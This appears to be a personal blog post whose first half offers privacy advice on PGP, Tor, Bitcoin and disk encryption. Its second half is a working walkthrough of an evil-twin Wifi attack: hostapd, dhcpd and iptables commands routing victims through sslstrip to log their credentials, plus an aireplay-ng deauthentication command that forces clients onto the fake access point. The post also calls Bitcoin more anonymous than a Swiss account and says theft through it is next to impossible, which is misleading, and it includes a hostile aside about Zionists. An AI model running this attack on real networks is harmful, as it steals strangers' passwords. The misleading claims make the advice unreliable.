But in the wake of the PRISM scandal, we now know with certainty that the government is actively monitoring everyone. Therefore, I would like to impart my knowledge of encryption to the public. Here are four simple ways to keep yourself safe from the government.

A) Pretty Good Privacy (PGP) – This is a widely used, tried and tested method of encrypting text and files prior to sending them to the end user. Because all encryption is done prior to the connection, this is one of the better systems out there.

Here’s how it works: You exchange public keys with whoever you want to communicate with. When you want to send the other person a message, you encrypt the data with his public key (not your own). The end-user will decrypt the data with his private key (not yours). Conversely, if someone wants to send you a message, he will encrypt the message with your public key and you will then decrypt it with your (not his) private key.

If that’s confusing, think of it like giving people a lock-box that they can put contents in and lock and no one can unlock it but you. That lock-box is your public key. The key to the lock-box is your private key.

So, a few drawbacks to this method:

  • PGP’s major drawback is that without an infrastructure, anyone can create a fake public key in your name and send it around. Then, he can intercept messages intended for you, decrypt them, modify them if desired, and re-encrypt them with your actual public key before passing them along, and no one would be the wiser. It's a bit convoluted, but entirely possible.
    • You can easily get around that by creating a “web of trust”, but it involves a bit more work.
    • You can create an infrastructure for PGP if you want. MIT hosts their famous key server, but there are several infrastructural problems with it.
  • Let's be real, it's not 100% user-friendly or intuitive. Mailvelope is the best attempt I have seen to make it more user-friendly and I personally use it when not on Linux.
  • It is feasible that the NSA has the CPU and GPU power to brute-force a low-bit key.

If you are concerned about having your keys broken into, you can try generating a larger key:

$ gpg --batch --gen-key << EOF
> Key-Type: RSA
> Key-Length: 8192
> Key-Usage: Auth
> Name-Email: [Your email here]
> Name-Comment: [Some comment]
> %commit
> EOF

(Note: stock GnuPG builds cap RSA keys at 4096 bits, so an 8192-bit key may require a patched build.)

B) Tor, The Onion Protocol – The Tor protocol is a method of obscuring the originating source of a network connection. Tor accomplishes this by bouncing connections off of servers around the world. Each computer you bounce your connection off of knows the previous source and next destination, but does not know the hops two before or two after it. And given that all data through the network is encrypted, no one is able to meaningfully modify the intended next hops. After a number of hops, a final end-point (the exit node) will initiate the actual connection to the intended destination. That destination perceives the exit node as the source of the connection, but does not know the original source.

Tor is largely used for anonymous web-surfing, but because it functions as a SOCKS5 proxy, it can be used for just about anything!

Another innovation of Tor is Hidden Services. In the aforementioned configuration, the client knows who the server is, but the server does not know who the client is. A Hidden Service is when a server hides its identity, but the client is still able to connect to it. The mechanisms are too complex to explain here, but you can read about them on the Tor website.

You can download Tor from the Tor Project's website.

C) Bitcoin – Bitcoin is an operational electronic currency that is independent of any government. It offers security, anonymity, and is accepted by thousands of people worldwide.

Anonymity – User accounts, called Bitcoin addresses or simply addresses, appear as 27-34 arbitrary numbers and letters such as 31uEbMgunupShBVTewXjtqbBv5MndwfXhb. In reality, an address is derived from a public key, and the user controls it by holding the corresponding private key, which he uses to sign transactions. Addresses are completely independent of names, street addresses, phone numbers or any other identifying information, and the private key likewise carries no identifying information. That's more anonymous than a Swiss bank account!

Secure – Bitcoin uses robust public-key cryptography to secure transactions between the bitcoin sender and receiver. The sender of bitcoin (the payer) obtains the receiver's bitcoin address and digitally signs a transaction transferring his bitcoins to the receiver. This makes electronic theft carried out through the Bitcoin system itself next to impossible.
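
Bitcoin's real transaction format is more involved, but the core sign-and-verify idea can be sketched with ordinary openssl commands on secp256k1, the same curve Bitcoin uses. The file names and the stand-in "transaction" below are mine, for illustration only; this is not real Bitcoin tooling.

```shell
# Generate a keypair on secp256k1, the curve Bitcoin uses.
openssl ecparam -name secp256k1 -genkey -noout -out priv.pem
openssl ec -in priv.pem -pubout -out pub.pem

# "Sign" a stand-in transaction with the private key.
echo "pay 1 BTC to 31uEbMgunupShBVTewXjtqbBv5MndwfXhb" > tx.txt
openssl dgst -sha256 -sign priv.pem -out tx.sig tx.txt

# Anyone with the public key can verify the signature.
openssl dgst -sha256 -verify pub.pem -signature tx.sig tx.txt  # prints: Verified OK
```

If even one byte of tx.txt is altered after signing, the verify step fails, which is exactly the property that makes forging a Bitcoin payment infeasible.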

The Bitcoin infrastructure has several components, so if you're interested, I suggest you watch the following video. It's a bit dated, but still a solid overview.

D) Disk Encryption – Disk Encryption is when data is encrypted while it is stored on your hard-drive.

If someone were to obtain physical access to your machine, either through theft or government seizure (same thing?), they would be able to access everything on your machine, including services you were currently logged in to, such as Gmail or Facebook. Disk Encryption is a method of preventing the bad guys from accessing your machine. There are dozens of types of disk encryption. Before I talk about the exact implementations, I want you to understand the concept.

Disk Encryption means that everything on your computer is encrypted, rather than encrypting individual files one by one. However, files are only encrypted when they reside on the hard-drive. So, if you email out a file, it will not be encrypted during transmission. For that, you will need to use PGP or a related technology.
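
Real disk encryption happens transparently below the filesystem, but the at-rest idea can be illustrated at file level with openssl's symmetric encryption. The file names and passphrase here are made up, and this is file-level encryption, not true disk-level encryption:

```shell
# At-rest demo: what sits on disk is ciphertext, readable only with the key.
echo "tax records" > secret.txt
openssl enc -aes-256-cbc -pbkdf2 -pass pass:hunter2 \
        -in secret.txt -out secret.enc
rm secret.txt                       # only the encrypted copy remains "on disk"

# With the passphrase, the plaintext comes right back.
openssl enc -d -aes-256-cbc -pbkdf2 -pass pass:hunter2 \
        -in secret.enc -out recovered.txt
```

A thief holding only secret.enc sees random-looking bytes; that is the same guarantee full-disk encryption extends to every sector of the drive.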

Windows has two main tools. The first is Microsoft's BitLocker full-disk encryption; however, this service is proprietary and requires Windows Professional. A free alternative is TrueCrypt, which functions in a similar manner.

One note about disk encryption tools: It is more than theoretically possible to recover the hard-drive encryption keys from the memory. It requires the attacker to literally freeze the RAM with a cooling agent, soft-reboot the machine, then boot into a custom system that performs a RAM-dump via Firewire — I have personally seen this done, it is not just theory.

Conclusion and Comments

The aforementioned technologies are, to the best of my knowledge, technically secure against even the most sophisticated attackers. However, there is one major weak link in this chain: the end-user. Users often make simple mistakes which allow attackers to circumvent the entire protective scheme.

For example, PGP and Disk Encryption ultimately rely on a password to protect the encryption in the event that an attacker gains physical access to the hard-drive or private keys. If your password is weak, say under 20 characters, your data is liable to be decrypted.

In the future, I hope that all of these technologies become easier and friendlier to use.

The only exception I can think of is if the computing power of the NSA is strong enough to break any of these mechanisms. That’s entirely possible. And violence trumps even that — put a gun to the head of even the most rabid Zionist and he’ll give anyone what they want to save his life.

That aside…happy encrypting!

Hotspot Hijacking & Password Capturing

Unless you know enough about security to know what’s going on behind the scenes, Wifi is beyond insecure. Even with SSL as an attempt to secure a web connection, your connection is still fundamentally insecure. This is an explanation of how someone could capture passwords and other variables sent over an SSL connection that uses Wifi. In essence, it's a Man in the Middle (MiM) attack over Wifi that modifies the victim’s HTTP connection and thus gathers GET and POST variables. I was not the first to create it, but I independently thought of it and then combined a few techniques together.

Here’s how it works:

Let's say you go to a Starbucks and they offer an open Wifi connection. Suppose the AP name is attwifi. First, the attacker connects his computer to the legitimate AP so that he can go online. (The attacker could use a separate means to get online; I just find this most convenient.)

Using a second wifi card that can go into Master mode, the attacker sets an IP address on a subnet that the legitimate Wifi network does not use. Since the attacker's machine will balance between the legitimate AP and the fake AP, it needs to be able to distinguish between the two and prevent address collisions, so an otherwise-unused subnet works great.

ifconfig wlan0
ifconfig wlan0 up

Then, the attacker must configure dhcpd, in my case, located in /etc/dhcp/dhcpd.conf:

subnet netmask {
	option domain-name-servers;
	option routers;
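
The addresses were stripped from the snippets above; with hypothetical values filled in (the 10.5.5.0/24 subnet, the 10.5.5.1 gateway, and the public resolver are all assumptions for illustration, not my original values), the interface and dhcpd configuration might look like:

```
# Hypothetical addressing: the fake AP's card (wlan0) takes 10.5.5.1/24.
ifconfig wlan0 10.5.5.1 netmask
ifconfig wlan0 up

# /etc/dhcp/dhcpd.conf
subnet netmask {
	range;
	option domain-name-servers;   # a public resolver
	option routers;            # the attacker's machine
}
```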

On the second wifi card the attacker must then create an AP with the same name as the legitimate AP. Most public APs are open networks without any encryption. But even if they weren't open, the host would likely just give you the password upon request. To create an open network, the attacker must set the following settings in /etc/hostapd/hostapd.conf:


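The config block itself was lost from this post, but a minimal open-network hostapd.conf looks something like the following (the interface name, driver, and channel are assumptions):

```
# /etc/hostapd/hostapd.conf -- minimal open (unencrypted) AP
interface=wlan0
driver=nl80211        # assumption: a mac80211-based card
ssid=attwifi          # same name as the legitimate AP
hw_mode=g
channel=6             # assumption: any legal channel works
auth_algs=1           # open system authentication, no WPA/WEP
```
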
Finally, start to turn stuff on. First, the layer 3 routing and NAT rules:

echo 1 > /proc/sys/net/ipv4/ip_forward # Allows routing
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE # Turns on NAT
iptables -A FORWARD -j ACCEPT # Accepts everything

Then turn on dhcpd, binding it to the fake AP's interface:

dhcpd wlan0

Then I start broadcasting the Access Point:

hostapd /etc/hostapd/hostapd.conf

At this point, anyone who connects to attwifi will connect either to the attacker or to the authentic AP. As of now it makes no difference which they connect through. If they connect through the attacker's AP, they will just be forwarded through the real attwifi AP anyways, with an unnoticed extra hop.

Up to this point you've simply done a Man in the Middle (MiM). The final step is where the magic lies. The attacker must redirect connections to port 80 through sslstrip, a tool that intercepts a victim's web requests, removes all references to SSL (i.e., changes ‘https’ to ‘http’), and logs all relevant variables that are passed over. For the record, and so that I don't come across as a complete script kiddie, I wrote a tool similar to sslstrip, but sslstrip is significantly better and more cleanly written.

The attacker would do this:

iptables -t nat -A PREROUTING -p tcp -s --dport 80 -j DNAT --to-destination
python ./ -w attwifi.log -l 31337
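
The elided values above depend on the fake AP's addressing. With hypothetical values filled in (the 10.5.5.0/24 subnet and the attacker's 10.5.5.1 address are assumptions), and using stock sslstrip rather than my own tool, the redirect looks something like:

```
# Send the fake-AP clients' port-80 traffic into sslstrip on port 31337.
iptables -t nat -A PREROUTING -p tcp -s --dport 80 \
	-j DNAT --to-destination
sslstrip -w attwifi.log -l 31337
```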

At this point, the attacker's machine will be logging GET and POST variables directed through his machine, even if the connection was intended to be secured with SSL. The only sign the victim may notice is that his usually SSL-encrypted connection is no longer secure. A savvy user might notice this, but the vast majority will not. In fact, the way most sites are written, such as Facebook, you enter your credentials on an initially insecure page! While the form's GET or POST target is secure, the page you received is certainly not. Unless he checks the initial page's code, the victim would never know that his connection is being tampered with.

There’s one final optional step. A client might be connected to the correct AP for hours without any reason to disconnect. With Windows, if there are multiple APs by the same name and the user is experiencing connection issues on one, Windows will automatically switch to the other AP. You can break a user’s connection and force him to connect through you using the following command:

aireplay-ng -0 0 -a 00:AA:BB:CC:DD:EE -c 01:12:34:56:78:9A ath0

Where 00:AA:BB:CC:DD:EE is the access point and 01:12:34:56:78:9A is a client. This last step is particularly insidious.

The fundamental issue here is not a weakness in SSL, but a weakness in Wifi that allows for an easy MiM. However, there are some steps a web site can take to help fix the problem:

  1. Require users to go directly to the https:// version of the site instead of the http:// one. A simple redirection or link will not do, as sslstrip and similar programs can capture the redirection-attempt.
  2. Javascript code that does client-side verification to scan for page modifications
  3. Two-factor authentication, such as an RSA token. While this will not stop the attacker from capturing your variables, it makes re-authentication as the victim impossible. A great solution, but it won't prevent data leakage.
  4. Have the user click a link that requests login. Once at the new page, have an image pointing up at the URL bar asking the user to verify that SSL is being used. But this relies on too much user-verification.
  5. Change the port from 80 to 8080, or so, thus temporarily thwarting the iptables rule. But obviously a broader or more focused iptables rule would counter-thwart that.

Your thoughts…?

I doubt I have to legally add a disclaimer, but I’ll do it anyways… don’t do anything illegal! You are responsible for your own actions!